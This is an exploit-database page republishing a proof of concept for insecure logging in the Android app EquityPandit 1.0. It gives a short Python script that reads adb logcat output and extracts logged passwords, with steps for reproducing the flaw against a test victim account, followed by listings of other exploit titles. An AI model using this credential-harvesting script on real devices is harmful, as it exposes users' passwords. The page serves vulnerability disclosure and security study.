Search for hundreds of thousands of exploits

"EquityPandit 1.0 - Password Disclosure"

Author

Exploit author

ManhNho

Platform

Exploit platform

android

Release date

Exploit published date

2019-05-28

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#Exploit title: EquityPandit v1.0 - Insecure Logging
#Date:27/05/2019
#Exploit Author: ManhNho
#Software name: "EquityPandit"
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
#Version: 1.0
# Category: Android apps
#Description:

   - Sometimes developers keeps sensitive data logged into the developer
   console. Thus, attacker easy to capture sensitive information like password.
   - In this application, with adb, attacker can capture password of any
   users via forgot password function.

#Requirement:

   - Santoku virtual machine
   - Android virtual machine (installed "EquityPandit" apk file)
   - Victim user/password: victim@abc.com/123456
   - Exploit code named capture.py in Santoku vm as below:

import subprocess
import re

process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
stdout=subprocess.PIPE)
dumps = process_handler.stdout.read()
password_list = re.findall(r'password\s(.*)', dumps)
print 'Captured %i passwords! \nThey are:' %len(password_list)
for index, item in enumerate(password_list):
	print '\t#%i: %s' %(int(index)+1, item)

#Reproduce:

   - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)

adb connect x.x.x.x


   - Step 2: From Android machine, open EquityPandit, click forgot password
   function for acccount "victim@abc.com" and then click submit
   - Step 3: From Santoku, execute capture.py
   - Actual: Password of "victim@abc.com" will be show in terminal as
   "123456"

#Demo:

https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv
Release DateTitleTypePlatformAuthor
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-02-24"Android Binder - Use-After-Free (Metasploit)"localandroidMetasploit
2020-01-14"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN"dosandroid"Google Security Research"
2020-01-14"WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM"dosandroid"Google Security Research"
2019-11-08"Android Janus - APK Signature Bypass (Metasploit)"localandroidMetasploit
2019-10-16"Whatsapp 2.19.216 - Remote Code Execution"remoteandroid"Valerio Brussani"
2019-10-04"Android - Binder Driver Use-After-Free"localandroid"Google Security Research"
2019-08-30"Canon PRINT 2.5.5 - Information Disclosure"localandroid0x48piraj
2019-07-15"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write"dosandroid"Marcin Kozlowski"
2019-05-29"Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL"dosandroid"Google Security Research"
2019-05-28"EquityPandit 1.0 - Password Disclosure"localandroidManhNho
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46933/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.